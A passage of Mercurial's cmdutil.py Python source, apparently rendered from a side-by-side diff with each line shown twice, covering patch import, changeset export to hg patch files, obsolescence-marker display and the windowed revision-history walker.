1431 p1 = repo[p1]
1432 p1 = repo[p1]
1432 p2 = repo[p2 or nullid]
1433 p2 = repo[p2 or nullid]
1433 elif p2:
1434 elif p2:
1434 try:
1435 try:
1435 p1 = repo[p1]
1436 p1 = repo[p1]
1436 p2 = repo[p2]
1437 p2 = repo[p2]
1437 # Without any options, consider p2 only if the
1438 # Without any options, consider p2 only if the
1438 # patch is being applied on top of the recorded
1439 # patch is being applied on top of the recorded
1439 # first parent.
1440 # first parent.
1440 if p1 != parents[0]:
1441 if p1 != parents[0]:
1441 p1 = parents[0]
1442 p1 = parents[0]
1442 p2 = repo[nullid]
1443 p2 = repo[nullid]
1443 except error.RepoError:
1444 except error.RepoError:
1444 p1, p2 = parents
1445 p1, p2 = parents
1445 if p2.node() == nullid:
1446 if p2.node() == nullid:
1446 ui.warn(_("warning: import the patch as a normal revision\n"
1447 ui.warn(_("warning: import the patch as a normal revision\n"
1447 "(use --exact to import the patch as a merge)\n"))
1448 "(use --exact to import the patch as a merge)\n"))
1448 else:
1449 else:
1449 p1, p2 = parents
1450 p1, p2 = parents
1450
1451
1451 n = None
1452 n = None
1452 if update:
1453 if update:
1453 if p1 != parents[0]:
1454 if p1 != parents[0]:
1454 updatefunc(repo, p1.node())
1455 updatefunc(repo, p1.node())
1455 if p2 != parents[1]:
1456 if p2 != parents[1]:
1456 repo.setparents(p1.node(), p2.node())
1457 repo.setparents(p1.node(), p2.node())
1457
1458
1458 if opts.get('exact') or importbranch:
1459 if opts.get('exact') or importbranch:
1459 repo.dirstate.setbranch(branch or 'default')
1460 repo.dirstate.setbranch(branch or 'default')
1460
1461
1461 partial = opts.get('partial', False)
1462 partial = opts.get('partial', False)
1462 files = set()
1463 files = set()
1463 try:
1464 try:
1464 patch.patch(ui, repo, tmpname, strip=strip, prefix=prefix,
1465 patch.patch(ui, repo, tmpname, strip=strip, prefix=prefix,
1465 files=files, eolmode=None, similarity=sim / 100.0)
1466 files=files, eolmode=None, similarity=sim / 100.0)
1466 except error.PatchError as e:
1467 except error.PatchError as e:
1467 if not partial:
1468 if not partial:
1468 raise error.Abort(pycompat.bytestr(e))
1469 raise error.Abort(pycompat.bytestr(e))
1469 if partial:
1470 if partial:
1470 rejects = True
1471 rejects = True
1471
1472
1472 files = list(files)
1473 files = list(files)
1473 if nocommit:
1474 if nocommit:
1474 if message:
1475 if message:
1475 msgs.append(message)
1476 msgs.append(message)
1476 else:
1477 else:
1477 if opts.get('exact') or p2:
1478 if opts.get('exact') or p2:
1478 # If you got here, you either use --force and know what
1479 # If you got here, you either use --force and know what
1479 # you are doing or used --exact or a merge patch while
1480 # you are doing or used --exact or a merge patch while
1480 # being updated to its first parent.
1481 # being updated to its first parent.
1481 m = None
1482 m = None
1482 else:
1483 else:
1483 m = scmutil.matchfiles(repo, files or [])
1484 m = scmutil.matchfiles(repo, files or [])
1484 editform = mergeeditform(repo[None], 'import.normal')
1485 editform = mergeeditform(repo[None], 'import.normal')
1485 if opts.get('exact'):
1486 if opts.get('exact'):
1486 editor = None
1487 editor = None
1487 else:
1488 else:
1488 editor = getcommiteditor(editform=editform,
1489 editor = getcommiteditor(editform=editform,
1489 **pycompat.strkwargs(opts))
1490 **pycompat.strkwargs(opts))
1490 extra = {}
1491 extra = {}
1491 for idfunc in extrapreimport:
1492 for idfunc in extrapreimport:
1492 extrapreimportmap[idfunc](repo, patchdata, extra, opts)
1493 extrapreimportmap[idfunc](repo, patchdata, extra, opts)
1493 overrides = {}
1494 overrides = {}
1494 if partial:
1495 if partial:
1495 overrides[('ui', 'allowemptycommit')] = True
1496 overrides[('ui', 'allowemptycommit')] = True
1496 with repo.ui.configoverride(overrides, 'import'):
1497 with repo.ui.configoverride(overrides, 'import'):
1497 n = repo.commit(message, user,
1498 n = repo.commit(message, user,
1498 date, match=m,
1499 date, match=m,
1499 editor=editor, extra=extra)
1500 editor=editor, extra=extra)
1500 for idfunc in extrapostimport:
1501 for idfunc in extrapostimport:
1501 extrapostimportmap[idfunc](repo[n])
1502 extrapostimportmap[idfunc](repo[n])
1502 else:
1503 else:
1503 if opts.get('exact') or importbranch:
1504 if opts.get('exact') or importbranch:
1504 branch = branch or 'default'
1505 branch = branch or 'default'
1505 else:
1506 else:
1506 branch = p1.branch()
1507 branch = p1.branch()
1507 store = patch.filestore()
1508 store = patch.filestore()
1508 try:
1509 try:
1509 files = set()
1510 files = set()
1510 try:
1511 try:
1511 patch.patchrepo(ui, repo, p1, store, tmpname, strip, prefix,
1512 patch.patchrepo(ui, repo, p1, store, tmpname, strip, prefix,
1512 files, eolmode=None)
1513 files, eolmode=None)
1513 except error.PatchError as e:
1514 except error.PatchError as e:
1514 raise error.Abort(stringutil.forcebytestr(e))
1515 raise error.Abort(stringutil.forcebytestr(e))
1515 if opts.get('exact'):
1516 if opts.get('exact'):
1516 editor = None
1517 editor = None
1517 else:
1518 else:
1518 editor = getcommiteditor(editform='import.bypass')
1519 editor = getcommiteditor(editform='import.bypass')
1519 memctx = context.memctx(repo, (p1.node(), p2.node()),
1520 memctx = context.memctx(repo, (p1.node(), p2.node()),
1520 message,
1521 message,
1521 files=files,
1522 files=files,
1522 filectxfn=store,
1523 filectxfn=store,
1523 user=user,
1524 user=user,
1524 date=date,
1525 date=date,
1525 branch=branch,
1526 branch=branch,
1526 editor=editor)
1527 editor=editor)
1527 n = memctx.commit()
1528 n = memctx.commit()
1528 finally:
1529 finally:
1529 store.close()
1530 store.close()
1530 if opts.get('exact') and nocommit:
1531 if opts.get('exact') and nocommit:
1531 # --exact with --no-commit is still useful in that it does merge
1532 # --exact with --no-commit is still useful in that it does merge
1532 # and branch bits
1533 # and branch bits
1533 ui.warn(_("warning: can't check exact import with --no-commit\n"))
1534 ui.warn(_("warning: can't check exact import with --no-commit\n"))
1534 elif opts.get('exact') and (not n or hex(n) != nodeid):
1535 elif opts.get('exact') and (not n or hex(n) != nodeid):
1535 raise error.Abort(_('patch is damaged or loses information'))
1536 raise error.Abort(_('patch is damaged or loses information'))
1536 msg = _('applied to working directory')
1537 msg = _('applied to working directory')
1537 if n:
1538 if n:
1538 # i18n: refers to a short changeset id
1539 # i18n: refers to a short changeset id
1539 msg = _('created %s') % short(n)
1540 msg = _('created %s') % short(n)
1540 return msg, n, rejects
1541 return msg, n, rejects
1541
1542
1542 # facility to let extensions include additional data in an exported patch
1543 # facility to let extensions include additional data in an exported patch
1543 # list of identifiers to be executed in order
1544 # list of identifiers to be executed in order
1544 extraexport = []
1545 extraexport = []
1545 # mapping from identifier to actual export function
1546 # mapping from identifier to actual export function
1546 # function as to return a string to be added to the header or None
1547 # function as to return a string to be added to the header or None
1547 # it is given two arguments (sequencenumber, changectx)
1548 # it is given two arguments (sequencenumber, changectx)
1548 extraexportmap = {}
1549 extraexportmap = {}
1549
1550
1550 def _exportsingle(repo, ctx, fm, match, switch_parent, seqno, diffopts):
1551 def _exportsingle(repo, ctx, fm, match, switch_parent, seqno, diffopts):
1551 node = scmutil.binnode(ctx)
1552 node = scmutil.binnode(ctx)
1552 parents = [p.node() for p in ctx.parents() if p]
1553 parents = [p.node() for p in ctx.parents() if p]
1553 branch = ctx.branch()
1554 branch = ctx.branch()
1554 if switch_parent:
1555 if switch_parent:
1555 parents.reverse()
1556 parents.reverse()
1556
1557
1557 if parents:
1558 if parents:
1558 prev = parents[0]
1559 prev = parents[0]
1559 else:
1560 else:
1560 prev = nullid
1561 prev = nullid
1561
1562
1562 fm.context(ctx=ctx)
1563 fm.context(ctx=ctx)
1563 fm.plain('# HG changeset patch\n')
1564 fm.plain('# HG changeset patch\n')
1564 fm.write('user', '# User %s\n', ctx.user())
1565 fm.write('user', '# User %s\n', ctx.user())
1565 fm.plain('# Date %d %d\n' % ctx.date())
1566 fm.plain('# Date %d %d\n' % ctx.date())
1566 fm.write('date', '# %s\n', fm.formatdate(ctx.date()))
1567 fm.write('date', '# %s\n', fm.formatdate(ctx.date()))
1567 fm.condwrite(branch and branch != 'default',
1568 fm.condwrite(branch and branch != 'default',
1568 'branch', '# Branch %s\n', branch)
1569 'branch', '# Branch %s\n', branch)
1569 fm.write('node', '# Node ID %s\n', hex(node))
1570 fm.write('node', '# Node ID %s\n', hex(node))
1570 fm.plain('# Parent %s\n' % hex(prev))
1571 fm.plain('# Parent %s\n' % hex(prev))
1571 if len(parents) > 1:
1572 if len(parents) > 1:
1572 fm.plain('# Parent %s\n' % hex(parents[1]))
1573 fm.plain('# Parent %s\n' % hex(parents[1]))
1573 fm.data(parents=fm.formatlist(pycompat.maplist(hex, parents), name='node'))
1574 fm.data(parents=fm.formatlist(pycompat.maplist(hex, parents), name='node'))
1574
1575
1575 # TODO: redesign extraexportmap function to support formatter
1576 # TODO: redesign extraexportmap function to support formatter
1576 for headerid in extraexport:
1577 for headerid in extraexport:
1577 header = extraexportmap[headerid](seqno, ctx)
1578 header = extraexportmap[headerid](seqno, ctx)
1578 if header is not None:
1579 if header is not None:
1579 fm.plain('# %s\n' % header)
1580 fm.plain('# %s\n' % header)
1580
1581
1581 fm.write('desc', '%s\n', ctx.description().rstrip())
1582 fm.write('desc', '%s\n', ctx.description().rstrip())
1582 fm.plain('\n')
1583 fm.plain('\n')
1583
1584
1584 if fm.isplain():
1585 if fm.isplain():
1585 chunkiter = patch.diffui(repo, prev, node, match, opts=diffopts)
1586 chunkiter = patch.diffui(repo, prev, node, match, opts=diffopts)
1586 for chunk, label in chunkiter:
1587 for chunk, label in chunkiter:
1587 fm.plain(chunk, label=label)
1588 fm.plain(chunk, label=label)
1588 else:
1589 else:
1589 chunkiter = patch.diff(repo, prev, node, match, opts=diffopts)
1590 chunkiter = patch.diff(repo, prev, node, match, opts=diffopts)
1590 # TODO: make it structured?
1591 # TODO: make it structured?
1591 fm.data(diff=b''.join(chunkiter))
1592 fm.data(diff=b''.join(chunkiter))
1592
1593
1593 def _exportfile(repo, revs, fm, dest, switch_parent, diffopts, match):
1594 def _exportfile(repo, revs, fm, dest, switch_parent, diffopts, match):
1594 """Export changesets to stdout or a single file"""
1595 """Export changesets to stdout or a single file"""
1595 for seqno, rev in enumerate(revs, 1):
1596 for seqno, rev in enumerate(revs, 1):
1596 ctx = repo[rev]
1597 ctx = repo[rev]
1597 if not dest.startswith('<'):
1598 if not dest.startswith('<'):
1598 repo.ui.note("%s\n" % dest)
1599 repo.ui.note("%s\n" % dest)
1599 fm.startitem()
1600 fm.startitem()
1600 _exportsingle(repo, ctx, fm, match, switch_parent, seqno, diffopts)
1601 _exportsingle(repo, ctx, fm, match, switch_parent, seqno, diffopts)
1601
1602
1602 def _exportfntemplate(repo, revs, basefm, fntemplate, switch_parent, diffopts,
1603 def _exportfntemplate(repo, revs, basefm, fntemplate, switch_parent, diffopts,
1603 match):
1604 match):
1604 """Export changesets to possibly multiple files"""
1605 """Export changesets to possibly multiple files"""
1605 total = len(revs)
1606 total = len(revs)
1606 revwidth = max(len(str(rev)) for rev in revs)
1607 revwidth = max(len(str(rev)) for rev in revs)
1607 filemap = util.sortdict() # filename: [(seqno, rev), ...]
1608 filemap = util.sortdict() # filename: [(seqno, rev), ...]
1608
1609
1609 for seqno, rev in enumerate(revs, 1):
1610 for seqno, rev in enumerate(revs, 1):
1610 ctx = repo[rev]
1611 ctx = repo[rev]
1611 dest = makefilename(ctx, fntemplate,
1612 dest = makefilename(ctx, fntemplate,
1612 total=total, seqno=seqno, revwidth=revwidth)
1613 total=total, seqno=seqno, revwidth=revwidth)
1613 filemap.setdefault(dest, []).append((seqno, rev))
1614 filemap.setdefault(dest, []).append((seqno, rev))
1614
1615
1615 for dest in filemap:
1616 for dest in filemap:
1616 with formatter.maybereopen(basefm, dest) as fm:
1617 with formatter.maybereopen(basefm, dest) as fm:
1617 repo.ui.note("%s\n" % dest)
1618 repo.ui.note("%s\n" % dest)
1618 for seqno, rev in filemap[dest]:
1619 for seqno, rev in filemap[dest]:
1619 fm.startitem()
1620 fm.startitem()
1620 ctx = repo[rev]
1621 ctx = repo[rev]
1621 _exportsingle(repo, ctx, fm, match, switch_parent, seqno,
1622 _exportsingle(repo, ctx, fm, match, switch_parent, seqno,
1622 diffopts)
1623 diffopts)
1623
1624
1624 def export(repo, revs, basefm, fntemplate='hg-%h.patch', switch_parent=False,
1625 def export(repo, revs, basefm, fntemplate='hg-%h.patch', switch_parent=False,
1625 opts=None, match=None):
1626 opts=None, match=None):
1626 '''export changesets as hg patches
1627 '''export changesets as hg patches
1627
1628
1628 Args:
1629 Args:
1629 repo: The repository from which we're exporting revisions.
1630 repo: The repository from which we're exporting revisions.
1630 revs: A list of revisions to export as revision numbers.
1631 revs: A list of revisions to export as revision numbers.
1631 basefm: A formatter to which patches should be written.
1632 basefm: A formatter to which patches should be written.
1632 fntemplate: An optional string to use for generating patch file names.
1633 fntemplate: An optional string to use for generating patch file names.
1633 switch_parent: If True, show diffs against second parent when not nullid.
1634 switch_parent: If True, show diffs against second parent when not nullid.
1634 Default is false, which always shows diff against p1.
1635 Default is false, which always shows diff against p1.
1635 opts: diff options to use for generating the patch.
1636 opts: diff options to use for generating the patch.
1636 match: If specified, only export changes to files matching this matcher.
1637 match: If specified, only export changes to files matching this matcher.
1637
1638
1638 Returns:
1639 Returns:
1639 Nothing.
1640 Nothing.
1640
1641
1641 Side Effect:
1642 Side Effect:
1642 "HG Changeset Patch" data is emitted to one of the following
1643 "HG Changeset Patch" data is emitted to one of the following
1643 destinations:
1644 destinations:
1644 fntemplate specified: Each rev is written to a unique file named using
1645 fntemplate specified: Each rev is written to a unique file named using
1645 the given template.
1646 the given template.
1646 Otherwise: All revs will be written to basefm.
1647 Otherwise: All revs will be written to basefm.
1647 '''
1648 '''
1648 scmutil.prefetchfiles(repo, revs, match)
1649 scmutil.prefetchfiles(repo, revs, match)
1649
1650
1650 if not fntemplate:
1651 if not fntemplate:
1651 _exportfile(repo, revs, basefm, '<unnamed>', switch_parent, opts, match)
1652 _exportfile(repo, revs, basefm, '<unnamed>', switch_parent, opts, match)
1652 else:
1653 else:
1653 _exportfntemplate(repo, revs, basefm, fntemplate, switch_parent, opts,
1654 _exportfntemplate(repo, revs, basefm, fntemplate, switch_parent, opts,
1654 match)
1655 match)
1655
1656
1656 def exportfile(repo, revs, fp, switch_parent=False, opts=None, match=None):
1657 def exportfile(repo, revs, fp, switch_parent=False, opts=None, match=None):
1657 """Export changesets to the given file stream"""
1658 """Export changesets to the given file stream"""
1658 scmutil.prefetchfiles(repo, revs, match)
1659 scmutil.prefetchfiles(repo, revs, match)
1659
1660
1660 dest = getattr(fp, 'name', '<unnamed>')
1661 dest = getattr(fp, 'name', '<unnamed>')
1661 with formatter.formatter(repo.ui, fp, 'export', {}) as fm:
1662 with formatter.formatter(repo.ui, fp, 'export', {}) as fm:
1662 _exportfile(repo, revs, fm, dest, switch_parent, opts, match)
1663 _exportfile(repo, revs, fm, dest, switch_parent, opts, match)
1663
1664
1664 def showmarker(fm, marker, index=None):
1665 def showmarker(fm, marker, index=None):
1665 """utility function to display obsolescence marker in a readable way
1666 """utility function to display obsolescence marker in a readable way
1666
1667
1667 To be used by debug function."""
1668 To be used by debug function."""
1668 if index is not None:
1669 if index is not None:
1669 fm.write('index', '%i ', index)
1670 fm.write('index', '%i ', index)
1670 fm.write('prednode', '%s ', hex(marker.prednode()))
1671 fm.write('prednode', '%s ', hex(marker.prednode()))
1671 succs = marker.succnodes()
1672 succs = marker.succnodes()
1672 fm.condwrite(succs, 'succnodes', '%s ',
1673 fm.condwrite(succs, 'succnodes', '%s ',
1673 fm.formatlist(map(hex, succs), name='node'))
1674 fm.formatlist(map(hex, succs), name='node'))
1674 fm.write('flag', '%X ', marker.flags())
1675 fm.write('flag', '%X ', marker.flags())
1675 parents = marker.parentnodes()
1676 parents = marker.parentnodes()
1676 if parents is not None:
1677 if parents is not None:
1677 fm.write('parentnodes', '{%s} ',
1678 fm.write('parentnodes', '{%s} ',
1678 fm.formatlist(map(hex, parents), name='node', sep=', '))
1679 fm.formatlist(map(hex, parents), name='node', sep=', '))
1679 fm.write('date', '(%s) ', fm.formatdate(marker.date()))
1680 fm.write('date', '(%s) ', fm.formatdate(marker.date()))
1680 meta = marker.metadata().copy()
1681 meta = marker.metadata().copy()
1681 meta.pop('date', None)
1682 meta.pop('date', None)
1682 smeta = util.rapply(pycompat.maybebytestr, meta)
1683 smeta = util.rapply(pycompat.maybebytestr, meta)
1683 fm.write('metadata', '{%s}', fm.formatdict(smeta, fmt='%r: %r', sep=', '))
1684 fm.write('metadata', '{%s}', fm.formatdict(smeta, fmt='%r: %r', sep=', '))
1684 fm.plain('\n')
1685 fm.plain('\n')
1685
1686
1686 def finddate(ui, repo, date):
1687 def finddate(ui, repo, date):
1687 """Find the tipmost changeset that matches the given date spec"""
1688 """Find the tipmost changeset that matches the given date spec"""
1688
1689
1689 df = dateutil.matchdate(date)
1690 df = dateutil.matchdate(date)
1690 m = scmutil.matchall(repo)
1691 m = scmutil.matchall(repo)
1691 results = {}
1692 results = {}
1692
1693
1693 def prep(ctx, fns):
1694 def prep(ctx, fns):
1694 d = ctx.date()
1695 d = ctx.date()
1695 if df(d[0]):
1696 if df(d[0]):
1696 results[ctx.rev()] = d
1697 results[ctx.rev()] = d
1697
1698
1698 for ctx in walkchangerevs(repo, m, {'rev': None}, prep):
1699 for ctx in walkchangerevs(repo, m, {'rev': None}, prep):
1699 rev = ctx.rev()
1700 rev = ctx.rev()
1700 if rev in results:
1701 if rev in results:
1701 ui.status(_("found revision %s from %s\n") %
1702 ui.status(_("found revision %s from %s\n") %
1702 (rev, dateutil.datestr(results[rev])))
1703 (rev, dateutil.datestr(results[rev])))
1703 return '%d' % rev
1704 return '%d' % rev
1704
1705
1705 raise error.Abort(_("revision matching date not found"))
1706 raise error.Abort(_("revision matching date not found"))
1706
1707
1707 def increasingwindows(windowsize=8, sizelimit=512):
1708 def increasingwindows(windowsize=8, sizelimit=512):
1708 while True:
1709 while True:
1709 yield windowsize
1710 yield windowsize
1710 if windowsize < sizelimit:
1711 if windowsize < sizelimit:
1711 windowsize *= 2
1712 windowsize *= 2
1712
1713
1713 def _walkrevs(repo, opts):
1714 def _walkrevs(repo, opts):
1714 # Default --rev value depends on --follow but --follow behavior
1715 # Default --rev value depends on --follow but --follow behavior
1715 # depends on revisions resolved from --rev...
1716 # depends on revisions resolved from --rev...
1716 follow = opts.get('follow') or opts.get('follow_first')
1717 follow = opts.get('follow') or opts.get('follow_first')
1717 if opts.get('rev'):
1718 if opts.get('rev'):
1718 revs = scmutil.revrange(repo, opts['rev'])
1719 revs = scmutil.revrange(repo, opts['rev'])
1719 elif follow and repo.dirstate.p1() == nullid:
1720 elif follow and repo.dirstate.p1() == nullid:
1720 revs = smartset.baseset()
1721 revs = smartset.baseset()
1721 elif follow:
1722 elif follow:
1722 revs = repo.revs('reverse(:.)')
1723 revs = repo.revs('reverse(:.)')
1723 else:
1724 else:
1724 revs = smartset.spanset(repo)
1725 revs = smartset.spanset(repo)
1725 revs.reverse()
1726 revs.reverse()
1726 return revs
1727 return revs
1727
1728
1728 class FileWalkError(Exception):
1729 class FileWalkError(Exception):
1729 pass
1730 pass
1730
1731
1731 def walkfilerevs(repo, match, follow, revs, fncache):
1732 def walkfilerevs(repo, match, follow, revs, fncache):
1732 '''Walks the file history for the matched files.
1733 '''Walks the file history for the matched files.
1733
1734
1734 Returns the changeset revs that are involved in the file history.
1735 Returns the changeset revs that are involved in the file history.
1735
1736
1736 Throws FileWalkError if the file history can't be walked using
1737 Throws FileWalkError if the file history can't be walked using
1737 filelogs alone.
1738 filelogs alone.
1738 '''
1739 '''
1739 wanted = set()
1740 wanted = set()
1740 copies = []
1741 copies = []
1741 minrev, maxrev = min(revs), max(revs)
1742 minrev, maxrev = min(revs), max(revs)
1742 def filerevgen(filelog, last):
1743 def filerevgen(filelog, last):
1743 """
1744 """
1744 Only files, no patterns. Check the history of each file.
1745 Only files, no patterns. Check the history of each file.
1745
1746
1746 Examines filelog entries within minrev, maxrev linkrev range
1747 Examines filelog entries within minrev, maxrev linkrev range
1747 Returns an iterator yielding (linkrev, parentlinkrevs, copied)
1748 Returns an iterator yielding (linkrev, parentlinkrevs, copied)
1748 tuples in backwards order
1749 tuples in backwards order
1749 """
1750 """
1750 cl_count = len(repo)
1751 cl_count = len(repo)
1751 revs = []
1752 revs = []
1752 for j in xrange(0, last + 1):
1753 for j in xrange(0, last + 1):
1753 linkrev = filelog.linkrev(j)
1754 linkrev = filelog.linkrev(j)
1754 if linkrev < minrev:
1755 if linkrev < minrev:
1755 continue
1756 continue
1756 # only yield rev for which we have the changelog, it can
1757 # only yield rev for which we have the changelog, it can
1757 # happen while doing "hg log" during a pull or commit
1758 # happen while doing "hg log" during a pull or commit
1758 if linkrev >= cl_count:
1759 if linkrev >= cl_count:
1759 break
1760 break
1760
1761
1761 parentlinkrevs = []
1762 parentlinkrevs = []
1762 for p in filelog.parentrevs(j):
1763 for p in filelog.parentrevs(j):
1763 if p != nullrev:
1764 if p != nullrev:
1764 parentlinkrevs.append(filelog.linkrev(p))
1765 parentlinkrevs.append(filelog.linkrev(p))
1765 n = filelog.node(j)
1766 n = filelog.node(j)
1766 revs.append((linkrev, parentlinkrevs,
1767 revs.append((linkrev, parentlinkrevs,
1767 follow and filelog.renamed(n)))
1768 follow and filelog.renamed(n)))
1768
1769
1769 return reversed(revs)
1770 return reversed(revs)
1770 def iterfiles():
1771 def iterfiles():
1771 pctx = repo['.']
1772 pctx = repo['.']
1772 for filename in match.files():
1773 for filename in match.files():
1773 if follow:
1774 if follow:
1774 if filename not in pctx:
1775 if filename not in pctx:
1775 raise error.Abort(_('cannot follow file not in parent '
1776 raise error.Abort(_('cannot follow file not in parent '
1776 'revision: "%s"') % filename)
1777 'revision: "%s"') % filename)
1777 yield filename, pctx[filename].filenode()
1778 yield filename, pctx[filename].filenode()
1778 else:
1779 else:
1779 yield filename, None
1780 yield filename, None
1780 for filename_node in copies:
1781 for filename_node in copies:
1781 yield filename_node
1782 yield filename_node
1782
1783
1783 for file_, node in iterfiles():
1784 for file_, node in iterfiles():
1784 filelog = repo.file(file_)
1785 filelog = repo.file(file_)
1785 if not len(filelog):
1786 if not len(filelog):
1786 if node is None:
1787 if node is None:
1787 # A zero count may be a directory or deleted file, so
1788 # A zero count may be a directory or deleted file, so
1788 # try to find matching entries on the slow path.
1789 # try to find matching entries on the slow path.
1789 if follow:
1790 if follow:
1790 raise error.Abort(
1791 raise error.Abort(
1791 _('cannot follow nonexistent file: "%s"') % file_)
1792 _('cannot follow nonexistent file: "%s"') % file_)
1792 raise FileWalkError("Cannot walk via filelog")
1793 raise FileWalkError("Cannot walk via filelog")
1793 else:
1794 else:
1794 continue
1795 continue
1795
1796
1796 if node is None:
1797 if node is None:
1797 last = len(filelog) - 1
1798 last = len(filelog) - 1
1798 else:
1799 else:
1799 last = filelog.rev(node)
1800 last = filelog.rev(node)
1800
1801
1801 # keep track of all ancestors of the file
1802 # keep track of all ancestors of the file
1802 ancestors = {filelog.linkrev(last)}
1803 ancestors = {filelog.linkrev(last)}
1803
1804
1804 # iterate from latest to oldest revision
1805 # iterate from latest to oldest revision
1805 for rev, flparentlinkrevs, copied in filerevgen(filelog, last):
1806 for rev, flparentlinkrevs, copied in filerevgen(filelog, last):
1806 if not follow:
1807 if not follow:
1807 if rev > maxrev:
1808 if rev > maxrev:
1808 continue
1809 continue
1809 else:
1810 else:
1810 # Note that last might not be the first interesting
1811 # Note that last might not be the first interesting
1811 # rev to us:
1812 # rev to us:
1812 # if the file has been changed after maxrev, we'll
1813 # if the file has been changed after maxrev, we'll
1813 # have linkrev(last) > maxrev, and we still need
1814 # have linkrev(last) > maxrev, and we still need
1814 # to explore the file graph
1815 # to explore the file graph
1815 if rev not in ancestors:
1816 if rev not in ancestors:
1816 continue
1817 continue
1817 # XXX insert 1327 fix here
1818 # XXX insert 1327 fix here
1818 if flparentlinkrevs:
1819 if flparentlinkrevs:
1819 ancestors.update(flparentlinkrevs)
1820 ancestors.update(flparentlinkrevs)
1820
1821
1821 fncache.setdefault(rev, []).append(file_)
1822 fncache.setdefault(rev, []).append(file_)
1822 wanted.add(rev)
1823 wanted.add(rev)
1823 if copied:
1824 if copied:
1824 copies.append(copied)
1825 copies.append(copied)
1825
1826
1826 return wanted
1827 return wanted
1827
1828
1828 class _followfilter(object):
1829 class _followfilter(object):
1829 def __init__(self, repo, onlyfirst=False):
1830 def __init__(self, repo, onlyfirst=False):
1830 self.repo = repo
1831 self.repo = repo
1831 self.startrev = nullrev
1832 self.startrev = nullrev
1832 self.roots = set()
1833 self.roots = set()
1833 self.onlyfirst = onlyfirst
1834 self.onlyfirst = onlyfirst
1834
1835
1835 def match(self, rev):
1836 def match(self, rev):
1836 def realparents(rev):
1837 def realparents(rev):
1837 if self.onlyfirst:
1838 if self.onlyfirst:
1838 return self.repo.changelog.parentrevs(rev)[0:1]
1839 return self.repo.changelog.parentrevs(rev)[0:1]
1839 else:
1840 else:
1840 return filter(lambda x: x != nullrev,
1841 return filter(lambda x: x != nullrev,
1841 self.repo.changelog.parentrevs(rev))
1842 self.repo.changelog.parentrevs(rev))
1842
1843
1843 if self.startrev == nullrev:
1844 if self.startrev == nullrev:
1844 self.startrev = rev
1845 self.startrev = rev
1845 return True
1846 return True
1846
1847
1847 if rev > self.startrev:
1848 if rev > self.startrev:
1848 # forward: all descendants
1849 # forward: all descendants
1849 if not self.roots:
1850 if not self.roots:
1850 self.roots.add(self.startrev)
1851 self.roots.add(self.startrev)
1851 for parent in realparents(rev):
1852 for parent in realparents(rev):
1852 if parent in self.roots:
1853 if parent in self.roots:
1853 self.roots.add(rev)
1854 self.roots.add(rev)
1854 return True
1855 return True
1855 else:
1856 else:
1856 # backwards: all parents
1857 # backwards: all parents
1857 if not self.roots:
1858 if not self.roots:
1858 self.roots.update(realparents(self.startrev))
1859 self.roots.update(realparents(self.startrev))
1859 if rev in self.roots:
1860 if rev in self.roots:
1860 self.roots.remove(rev)
1861 self.roots.remove(rev)
1861 self.roots.update(realparents(rev))
1862 self.roots.update(realparents(rev))
1862 return True
1863 return True
1863
1864
1864 return False
1865 return False
1865
1866
1866 def walkchangerevs(repo, match, opts, prepare):
1867 def walkchangerevs(repo, match, opts, prepare):
1867 '''Iterate over files and the revs in which they changed.
1868 '''Iterate over files and the revs in which they changed.
1868
1869
1869 Callers most commonly need to iterate backwards over the history
1870 Callers most commonly need to iterate backwards over the history
1870 in which they are interested. Doing so has awful (quadratic-looking)
1871 in which they are interested. Doing so has awful (quadratic-looking)
1871 performance, so we use iterators in a "windowed" way.
1872 performance, so we use iterators in a "windowed" way.
1872
1873
1873 We walk a window of revisions in the desired order. Within the
1874 We walk a window of revisions in the desired order. Within the
1874 window, we first walk forwards to gather data, then in the desired
1875 window, we first walk forwards to gather data, then in the desired
1875 order (usually backwards) to display it.
1876 order (usually backwards) to display it.
1876
1877
1877 This function returns an iterator yielding contexts. Before
1878 This function returns an iterator yielding contexts. Before
1878 yielding each context, the iterator will first call the prepare
1879 yielding each context, the iterator will first call the prepare
1879 function on each context in the window in forward order.'''
1880 function on each context in the window in forward order.'''
1880
1881
1881 allfiles = opts.get('allfiles')
1882 allfiles = opts.get('allfiles')
1882 follow = opts.get('follow') or opts.get('follow_first')
1883 follow = opts.get('follow') or opts.get('follow_first')
1883 revs = _walkrevs(repo, opts)
1884 revs = _walkrevs(repo, opts)
1884 if not revs:
1885 if not revs:
1885 return []
1886 return []
1886 if allfiles and len(revs) > 1:
1887 if allfiles and len(revs) > 1:
1887 raise error.Abort(_("multiple revisions not supported with --allfiles"))
1888 raise error.Abort(_("multiple revisions not supported with --allfiles"))
1888 wanted = set()
1889 wanted = set()
1889 slowpath = match.anypats() or (not match.always() and opts.get('removed'))
1890 slowpath = match.anypats() or (not match.always() and opts.get('removed'))
1890 fncache = {}
1891 fncache = {}
1891 change = repo.__getitem__
1892 change = repo.__getitem__
1892
1893
1893 # First step is to fill wanted, the set of revisions that we want to yield.
1894 # First step is to fill wanted, the set of revisions that we want to yield.
1894 # When it does not induce extra cost, we also fill fncache for revisions in
1895 # When it does not induce extra cost, we also fill fncache for revisions in
1895 # wanted: a cache of filenames that were changed (ctx.files()) and that
1896 # wanted: a cache of filenames that were changed (ctx.files()) and that
1896 # match the file filtering conditions.
1897 # match the file filtering conditions.
1897
1898
1898 if match.always():
1899 if match.always():
1899 # No files, no patterns. Display all revs.
1900 # No files, no patterns. Display all revs.
1900 wanted = revs
1901 wanted = revs
1901 elif not slowpath:
1902 elif not slowpath:
1902 # We only have to read through the filelog to find wanted revisions
1903 # We only have to read through the filelog to find wanted revisions
1903
1904
1904 try:
1905 try:
1905 wanted = walkfilerevs(repo, match, follow, revs, fncache)
1906 wanted = walkfilerevs(repo, match, follow, revs, fncache)
1906 except FileWalkError:
1907 except FileWalkError:
1907 slowpath = True
1908 slowpath = True
1908
1909
1909 # We decided to fall back to the slowpath because at least one
1910 # We decided to fall back to the slowpath because at least one
1910 # of the paths was not a file. Check to see if at least one of them
1911 # of the paths was not a file. Check to see if at least one of them
1911 # existed in history, otherwise simply return
1912 # existed in history, otherwise simply return
1912 for path in match.files():
1913 for path in match.files():
1913 if path == '.' or path in repo.store:
1914 if path == '.' or path in repo.store:
1914 break
1915 break
1915 else:
1916 else:
1916 return []
1917 return []
1917
1918
1918 if slowpath:
1919 if slowpath:
1919 # We have to read the changelog to match filenames against
1920 # We have to read the changelog to match filenames against
1920 # changed files
1921 # changed files
1921
1922
1922 if follow:
1923 if follow:
1923 raise error.Abort(_('can only follow copies/renames for explicit '
1924 raise error.Abort(_('can only follow copies/renames for explicit '
1924 'filenames'))
1925 'filenames'))
1925
1926
